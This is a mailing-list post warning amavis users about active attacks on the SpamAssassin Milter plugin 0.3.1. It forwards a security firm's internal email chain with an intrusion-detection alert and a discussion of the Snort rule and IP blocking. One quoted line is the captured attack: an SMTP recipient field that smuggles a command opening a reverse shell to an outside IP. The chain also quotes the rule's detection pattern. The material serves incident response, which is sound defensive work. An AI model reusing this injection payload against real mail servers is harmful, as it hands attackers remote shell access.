heads up: if case you are using spamassassin milter:
active exploits going on. <http://seclists.org/fulldisclosure/2010/Mar/140> <http://www.securityfocus.com/bid/38578> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1 I don't see anything on bugtraq about a fix. -------- Original Message -------- Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt The rule is only looking for this: content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; Personally, I would probably block it. Although, if we're not seeing this sort of thing pop up on customer's boxes, a manual block in scanner2 is sufficient for now, right? Either way, let me know and I'll block/unblock/leave alone. -- John Meyer Associate Security Engineer >|SECNAP Network Security Office: (561) 999-5000 x:1235 Direct: (561) 948-2264 *From:*Michael Scheidell *Sent:* Thursday, February 10, 2011 12:25 PM *To:* John Meyer *Cc:* Jonathan Scheidell; Anthony Wetula *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt is the snort rule specific enough that you can block the offending ip for 5 mins? (if its a real smtp server, it will retry) and legit email through. On 2/10/11 12:12 PM, John Meyer wrote: I don't like the looks of this. I blocked that IP with samtool. Payload: rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0" data . quit -- John Meyer Associate Security Engineer >|SECNAP Network Security Office: (561) 999-5000 x:1235 Direct: (561) 948-2264 *From:*SECNAP Network Security *Sent:* Thursday, February 10, 2011 12:01 PM *To:* security-al...@scanner2.secnap.com *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt 02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25 [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [Classification: Attempted User Privilege Gain] [Priority: 1] -- Michael Scheidell, CTO o: 561-999-5000 d: 561-948-2259 ISN: 1259*1300 >*| *SECNAP Network Security Corporation ·Certified SNORT Integrator ·2008-9 Hot Company Award Winner, World Executive Alliance ·Five-Star Partner Program 2009, VARBusiness ·Best in Email Security,2010: Network Products Guide ·King of Spam Filters, SC Magazine 2008 ______________________________________________________________________ This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.secnap.com/products/spammertrap/ ______________________________________________________________________ ------------------------------------------------------------------------------ The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: Pinpoint memory and threading errors before they happen. Find and fix more than 250 security defects in the development cycle. Locate bottlenecks in serial and parallel code that limit performance. http://p.sf.net/sfu/intel-dev2devfeb _______________________________________________ AMaViS-user mailing list AMaViS-user@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/amavis-user Please visit http://www.ijs.si/software/amavisd/ regularly For administrativa requests please send email to rainer at openantivirus dot org
